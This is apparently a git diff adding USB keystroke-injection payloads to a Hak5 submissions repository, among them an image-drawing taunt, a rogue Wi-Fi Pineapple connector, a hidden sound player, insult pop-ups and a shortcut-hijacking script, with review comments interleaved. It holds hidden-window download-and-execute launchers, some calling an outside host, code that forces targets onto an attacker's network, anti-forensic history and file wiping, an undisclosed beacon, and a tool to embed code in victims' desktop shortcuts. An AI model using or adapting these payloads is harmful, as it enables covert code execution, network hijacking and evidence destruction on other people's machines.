[System.Windows.Forms.Cursor]::Position.X + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } + + +<# + +.NOTES + This is where you call the function to draw out your image + Replace the path below with the path of your image + +.SYNTAX + "$env:TMP\omg-ico.png" | PS-Draw + PS-Draw -Path "$env:TMP\omg-ico.png" +#> + +# ------------------------------------------------------------------------------------------- + +# Call the function with the image you'd like to have drawn here + +"$env:TMP\omg-ico.png" | PS-Draw + diff --git a/Payloads/PS-Draw/PS-Draw.txt b/Payloads/PS-Draw/PS-Draw.txt new file mode 100644 index 0000000..c7f2762 --- /dev/null +++ b/Payloads/PS-Draw/PS-Draw.txt @@ -0,0 +1,17 @@ +REM Title: PS-Draw +REM +REM Author: I am Jakoby +REM +REM Description: This payload is meant to draw images in your targets powershell console. See PS-Draw.ps1 for more details +REM +REM Target: Windows 10, 11 +REM +REM Remember to replace the link with your link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly +REM +REM Download one of the two PS-Draw Execute files provided and execute it +REM +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +ENTER diff --git a/Payloads/PS-Draw/README.md b/Payloads/PS-Draw/README.md new file mode 100644 index 0000000..667cd39 --- /dev/null +++ b/Payloads/PS-Draw/README.md @@ -0,0 +1,146 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
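Review bot: In `Get-fullName`, `("$fullName").TrimStart("Full Name")` does not strip a prefix — .NET's `TrimStart` takes a set of characters, so every leading character that is one of F, u, l, N, a, m, e or space is removed and a user named "Neil Armstrong" is greeted as "il Armstrong". Strip the label as a prefix instead: `$fullName = ("$fullName" -replace '^Full Name\s*', '').Trim()`. The `catch` below it is also dead in practice — a failing `net user` does not raise a terminating error and the `-ErrorAction SilentlyContinue` after the `return` is unreachable — so the reliable fallback is `if (-not $fullName) { return $env:UserName }` after the call. Separately, in `PS-Draw`'s Process block both pixel loops start at 1 (`Foreach($y in (1..($BitMap.Height-1)))`) while `GetPixel` is 0-based, so the first row and column are never drawn, and the `Bitmap` returned by `FromFile` is never disposed, so the downloaded image typically stays open after the draw; use `0..` and add `$BitMap.Dispose()` after the loops.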
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# PS-Draw + +A script used to generate and draw images in the PowerShell window, used to leave a signature or perhaps taunt victims. + +## Description + +These two programs use two different methods to draw out images in the PowerShell window. + +PS-Draw will convert an image you download into a BMP file, estimate the colors used based off the 16 available powershell colors, +then draw your image out in the PowerShell window. This process is not exact and needs testing of multiple images to find one that works well. + +PS-Custom-Draw generates images to be drawn in the PowerShell window based off pre-configured arrays I put together already included in the file itself. +These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose. + +After the images are generated, a greeting will be generated by grabbing either the name associated with the registered Microsoft account or the +UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the PowerShell window. + +## Getting Started + +### Dependencies + +* DropBox or another image hosting service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your Device +* Invoke-WebRequest will be used to download the image + +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1 +``` +* The image will be converted into a BMP file +* An algorithm will be used to find the closest matching colors available in the powershell window +* The image will be generated in the powershell window + +This is an example of an image I used with the PS-Draw command + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/omg-ico.png?raw=true) + +This is how the iamge is interpreted and drawn out +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/PS-Draw.jpg?raw=true) + +* The PS-Custom-Draw operates a little differently +* One of the preconfigured arrays is piped into the command to generate an image + +* "$col | PS-Draw" - This first one will show the available colors to be used as seen below + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-colors.jpg?raw=true) + + +* "$omg | PS-Draw" - This will draw out the OMG logo as seen below + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-omg.jpg?raw=true) + + +* "$hak5 | PS-Draw" - This will draw out the Hak5 logo as seen below + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-hak5.jpg?raw=true) + + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/Payloads/PineApple/PineApple-KeyInjection.txt b/Payloads/PineApple/PineApple-KeyInjection.txt
new file mode 100644
index 0000000..33e0595
--- /dev/null
+++ b/Payloads/PineApple/PineApple-KeyInjection.txt
@@ -0,0 +1,79 @@
+REM Title: PineApple
+REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
+REM This version is a direct key stroke injection attack
+REM Author: I am Jakoby
+REM Target: Windows 10, 11
+REM
+DELAY 1000
+REM
+REM If the wifi pineapple SSID is detected target PC will connect to it
+REM
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+REM
+DELAY 1000
+REM
+STRING $profilefile="Home.xml";
+SHIFT ENTER
+STRING $SSID="PineApple";
+SHIFT ENTER
+STRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''
+SHIFT ENTER
+DELAY 500
+STRING $xmlfile="
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING $SSID
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING $SSIDHEX
+SHIFT ENTER
+STRING $SSID
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING ESS
+SHIFT ENTER
+STRING manual
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING open
+SHIFT ENTER
+STRING none
+SHIFT ENTER
+STRING false
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING "
+SHIFT ENTER
+STRING $XMLFILE > ($profilefile)
+SHIFT ENTER
+STRING netsh wlan add profile filename="$($profilefile)"
+SHIFT ENTER
+STRING netsh wlan connect name=$SSID
+SHIFT ENTER
+STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath
+REM
+DELAY 500
+ENTER
diff --git a/Payloads/PineApple/PineApple.ps1 b/Payloads/PineApple/PineApple.ps1
new file mode 100644
index 0000000..bc4fe83
--- /dev/null
+++ b/Payloads/PineApple/PineApple.ps1
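Review bot: The profile file written by `STRING $XMLFILE > ($profilefile)` (`Home.xml`, in whatever directory the PowerShell window opened in) is left on disk: the final cleanup line only clears the Run-box MRU and the PSReadLine history, so the wireless profile definition remains as an artifact in the user's profile directory, and the profile itself stays registered with `netsh wlan`. Append a delete to that last STRING line, e.g. `...; Remove-Item $profilefile -Force`, and consider a `netsh wlan delete profile name=$SSID` step for engagements that require a full rollback. One thing to confirm against the committed file: the XML body between `STRING $xmlfile="` and `STRING "` is not visible in this rendering, so whether the element tags are present there cannot be checked here.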
@@ -0,0 +1,52 @@ +$profilefile="Home.xml" +$SSID="PineApple" +$SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join'' +$xmlfile=" + +$SSID + + +$SSIDHEX +$SSID + + +ESS +manual + + + +open +none +false + + + + +" +$XMLFILE > ($profilefile) +netsh wlan add profile filename="$($profilefile)" +netsh wlan connect name=$SSID + +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin +iwr "https://jakoby.lol/hak5" -EA 0 >$null +Clear-RecycleBin -Force -ErrorAction SilentlyContinue diff --git a/Payloads/PineApple/PineApple.txt b/Payloads/PineApple/PineApple.txt new file mode 100644 index 0000000..4b12bda --- /dev/null +++ b/Payloads/PineApple/PineApple.txt 
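Review bot: The line `iwr "https://jakoby.lol/hak5" -EA 0 >$null` sits directly under `# Deletes contents of recycle bin` but does nothing of the kind — it is an outbound HTTPS request from the target to a third-party domain, with errors suppressed and output discarded, and neither the comment nor the README added in this commit mentions it. That is a run-time beacon to a host the operator does not control; it contradicts the "remove any evidence" intent of the cleanup section by leaving a DNS and proxy trail, and it should either be removed or documented prominently as telemetry with an opt-out. Two smaller points in the same file: `Home.xml` is written with `$XMLFILE > ($profilefile)` into the current directory and never removed, so add `Remove-Item $profilefile -Force` after the `netsh wlan add profile` call; and `rm $env:TEMP\* -r -Force` wipes the user's entire temp directory although this script never writes there.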
@@ -0,0 +1,17 @@
+REM Title: PineApple
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
+REM This version of the payload is executed using an invoke web-request to download and execute the file to add the PineApple's network profile
+REM The powershell script needed is provided as OMG-PineApple.ps1
+REM
+REM Target: Windows 10, 11
+REM
+REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
diff --git a/Payloads/PineApple/README.md b/Payloads/PineApple/README.md
new file mode 100644
index 0000000..67f48d4
--- /dev/null
+++ b/Payloads/PineApple/README.md
@@ -0,0 +1,109 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
+
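Review bot: The comment `REM The powershell script needed is provided as OMG-PineApple.ps1` names a file that does not exist in this commit — the script is added as `Payloads/PineApple/PineApple.ps1` — so an operator following the REM would look for the wrong filename. Change it to `REM The powershell script needed is provided as PineApple.ps1`; the `REM Remeber to replace the link` line in the same block also has a typo (`Remember`).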
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# PineApple + +A script used to connect a targets PC to your Wifi PineApple. + +## Description + +This program will generate an XML file that will be used to create a network profile for your Wifi PineApple. +The XML file will be manually entered into a PowerShell window. +The PowerShell window and run box will be erased for a clean exit. + +## Getting Started + +### Dependencies + +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* The entire script will be manually entered into the powershell window + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + + + +

(back to top)

diff --git a/Payloads/Play-WAV/Play-WAV.ps1 b/Payloads/Play-WAV/Play-WAV.ps1 new file mode 100644 index 0000000..983538d --- /dev/null +++ b/Payloads/Play-WAV/Play-WAV.ps1 
@@ -0,0 +1,93 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.NOTES + This script requires you to have a DropBox account or another file hosting service + +.DESCRIPTION + This program downloads a sound from your DropBox + Turns the volume to max level on victims PC + Pauses the script until a mouse movement is detected + Then plays the sound with nothing popping up catching your victim off guard + Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history + +#> + 
+############################################################################################################################################################ + +# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1") +# This is for if you want to host your own instance of this script + +#$wav = "" + +iwr $wav -O $env:TMP\e.wav + +############################################################################################################################################################ + +# This turns the volume up to max level +$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)} + +############################################################################################################################################################ + +# This while loop will constantly check if the mouse has been moved +# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off +# it will then sleep for the indicated number of seconds and check again + +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +############################################################################################################################################################ + +# Play Sound +$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync() + +############################################################################################################################################################ + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + 
+# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + diff --git a/Payloads/Play-WAV/Play-WAV.txt b/Payloads/Play-WAV/Play-WAV.txt new file mode 100644 index 0000000..2b25a3c --- /dev/null +++ b/Payloads/Play-WAV/Play-WAV.txt @@ -0,0 +1,16 @@ +REM Title: Play-WAV +REM +REM Author: I am Jakoby +REM +REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details +REM +REM Target: Windows 10, 11 +REM +REM Remeber to replace the link with your link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly +REM +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Ep Bypass $wav='';irm https://jakoby.lol/vus | iex +DELAY 500 +ENTER diff --git a/Payloads/Play-WAV/README.md b/Payloads/Play-WAV/README.md new file mode 100644 index 0000000..17ae6b9 --- /dev/null +++ b/Payloads/Play-WAV/README.md @@ -0,0 +1,114 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
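Review bot: Nothing guards the download: `$wav` is only ever set by the launcher (`$wav=''` in Play-WAV.txt) and the script's own `#$wav = ""` line is commented out, so with an empty value `iwr $wav -O $env:TMP\e.wav` fails with a parameter-binding error, the script carries on under the default error preference, maxes the volume, and then `$PlayWav.playsync()` throws on the missing `e.wav`. Guard both ends: `if (-not $wav) { return }` before the `iwr`, and `if (Test-Path "$env:TMP\e.wav") { ... }` around the playback lines. The keep-awake loop also contradicts its own comment — the comment says SCROLLLOCK but the code sends `{CAPSLOCK}`, and since every SendKeys press toggles the key, exiting after an odd number of iterations leaves Caps Lock on for the user; `$o.SendKeys("{SCROLLLOCK}")` matches the comment and is far less noticeable. Note that the `$o` used in that loop is the WScript.Shell object created on the volume line, so keep that ordering if the sections are rearranged.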
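Review bot: The launcher runs whatever `https://jakoby.lol/vus` serves at run time (`irm https://jakoby.lol/vus | iex`, under `-Ep Bypass`) rather than the operator's own copy of `Play-WAV.ps1`, so the code that executes on the target is controlled by a third-party short-link domain and can change without any change to this repository. Every other launcher in this commit uses the `< Your Shared link for the intended file>` placeholder; this one should do the same, e.g. `STRING powershell -w h -NoP -NonI -Ep Bypass $wav='';irm < Your Shared link for the intended file> | iex`, so operators run a reviewed, pinned copy. `$wav=''` also means no sound is downloaded unless the operator edits this line, which the REM block above does not say; a `REM Set $wav to the URL of your WAV file` line would make that explicit.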
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Play-WAV + +A script used to download a WAV file and play it after a mouse movement is detected. + +## Description + +This program starts off by using an Invoke-WebRequest to download a WAV file. +The system volume is then turned up to the max level. +Then the script will be paused until a mouse movement is detected. +After a mouse movement is detected, the WAV file will be played. + +## Getting Started + +### Dependencies + +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Place the WAV URL in the $wav variable +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download your WAV file + +``` +powershell -w h -NoP -NonI -Ep Bypass $wav='';irm https://jakoby.lol/vus | iex +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + + +

(back to top)

diff --git a/Payloads/Rage-PopUps/Rage-PopUps.ps1 b/Payloads/Rage-PopUps/Rage-PopUps.ps1 new file mode 100644 index 0000000..aaa4357 --- /dev/null +++ b/Payloads/Rage-PopUps/Rage-PopUps.ps1 
@@ -0,0 +1,74 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Rage-PopUps | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This script will open a series of pop-ups in order to taunt your target. I wrote it initially to target call center scammers. + +.DESCRIPTION + This program is meant to taunt your target. Below are a series insults you can modify as you like. The program will generate a Pop-up + for each one of them. 
+#> + +#------------------------------------------------------------------------------------------------------------------------------------ + +Add-Type -AssemblyName System.Windows.Forms + +# The number of times you want it to cycle through your list of questions + +$cycles = 3 + +# List as many questions here as you like, it will cycle through all of them + +$msgs = @( +"Are all scammers as dumb as you?" +"Is the pay worth being this big of a loser?" +"Do your parents know what you do for a living?" +"Does you boss know much much you suck at this job?" +) + +for ($i=1; $i -le $cycles; $i++) { + +Foreach ($msg in $msgs) { +[System.Windows.Forms.MessageBox]::Show($msg , "You're-a-Loser.exe" , 4 , 'Question') +} +} + +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue diff --git a/Payloads/Rage-PopUps/Rage-PopUps.txt b/Payloads/Rage-PopUps/Rage-PopUps.txt new file mode 100644 index 0000000..bdb3c2f --- /dev/null +++ b/Payloads/Rage-PopUps/Rage-PopUps.txt 
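Review bot: The cleanup block's `rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue` deletes the entire contents of the user's temp directory even though nothing above it writes there — the script only shows message boxes — so the line has no anti-forensic value against this payload's own traces and only destroys other applications' working files; the same holds for `Clear-RecycleBin -Force`, which discards the user's deleted files for no reason connected to the payload. Drop both and keep only the `RunMRU` and PSReadLine history lines, which are the traces this payload actually leaves. The pop-up loop itself is fine, though the bare `4` in `MessageBox]::Show($msg , "You're-a-Loser.exe" , 4 , 'Question')` would read better as `[System.Windows.Forms.MessageBoxButtons]::YesNo`.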
@@ -0,0 +1,16 @@ +REM Title: Rage-PopUps +REM +REM Author: I am Jakoby +REM +REM Description: This payload is meant to make a never ending supply of taunting pop-ups. See Rage-PopUps.ps1 for more details +REM +REM Target: Windows 10, 11 +REM +REM Remeber to replace the link with your link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly +REM +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +DELAY 500 +ENTER diff --git a/Payloads/ShortcutJacker/README.md b/Payloads/ShortcutJacker/README.md new file mode 100644 index 0000000..47e50af --- /dev/null +++ b/Payloads/ShortcutJacker/README.md @@ -0,0 +1,150 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Shortcut Jacker + +

+ + Python + +
YouTube Tutorial +

+ +A script used to embed malware in the shortcut on your target's desktop. + +## Description + +This payload will run a PowerShell script in the background of any shortcut used on the target's desktop. + +This is done by taking advantage of the `Target` field where PowerShell commands can be stored or run. + +This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the `$code` variable and it will still run. + +So if your command exceeds that, consider using an IWR function to download and execute a longer script. + +I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13) + + + +Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the PowerShell code you want executed is stored. + +--------------------------------------------------------------------------------------------------------------------------------------------------------- + + + +--------------------------------------------------------------------------------------------------------------------------------------------------------- + +Using the `Get-Shortcut` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the `Target` field. + + + +## Getting Started + +Once the script is executed, all of the shortcuts on your target's desktop will be infected with the PowerShell code you have stored in the `$code` variable in the .ps1 file + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/Payloads/ShortcutJacker/Shortcut-Jacker-Execute.txt b/Payloads/ShortcutJacker/Shortcut-Jacker-Execute.txt
new file mode 100644
index 0000000..45a9edb
--- /dev/null
+++ b/Payloads/ShortcutJacker/Shortcut-Jacker-Execute.txt
@@ -0,0 +1,10 @@
+REM Title: Shortcut-Jacker
+REM Author: I am Jakoby
+REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
+REM Target: Windows 10, 11
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass iwr LINK | iex
+ENTER
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
diff --git a/Payloads/ShortcutJacker/Shortcut-Jacker.ps1 b/Payloads/ShortcutJacker/Shortcut-Jacker.ps1
new file mode 100644
index 0000000..83603c4
--- /dev/null
+++ b/Payloads/ShortcutJacker/Shortcut-Jacker.ps1
@@ -0,0 +1,118 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This is payload used to inject PowerShell code into shortcuts. + +.DESCRIPTION + This payload will gather information on the shortcuts on your targets desktop. + That data will then be manipulated to embed a PowerShell script. + This script will be ran in the background when the short cut is. 
+ +#> + +############################################################################################################################################################ + +<# +.NOTES + The PowerShell code stored in this variable is what will run in the background. + This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code + variable and it will still run. +#> + +$code = "Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')" + +############################################################################################################################################################ + +function Get-Shortcut { + param( + $path = $null + ) + + $obj = New-Object -ComObject WScript.Shell + + if ($path -eq $null) { + $pathUser = [System.Environment]::GetFolderPath('StartMenu') + $pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu') + $path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse + } + if ($path -is [string]) { + $path = dir $path -Filter *.lnk + } + $path | ForEach-Object { + if ($_ -is [string]) { + $_ = dir $_ -Filter *.lnk + } + if ($_) { + $link = $obj.CreateShortcut($_.FullName) + + $info = @{} + $info.Hotkey = $link.Hotkey + $info.TargetPath = $link.TargetPath + $info.LinkPath = $link.FullName + $info.Arguments = $link.Arguments + $info.Target = try {Split-Path 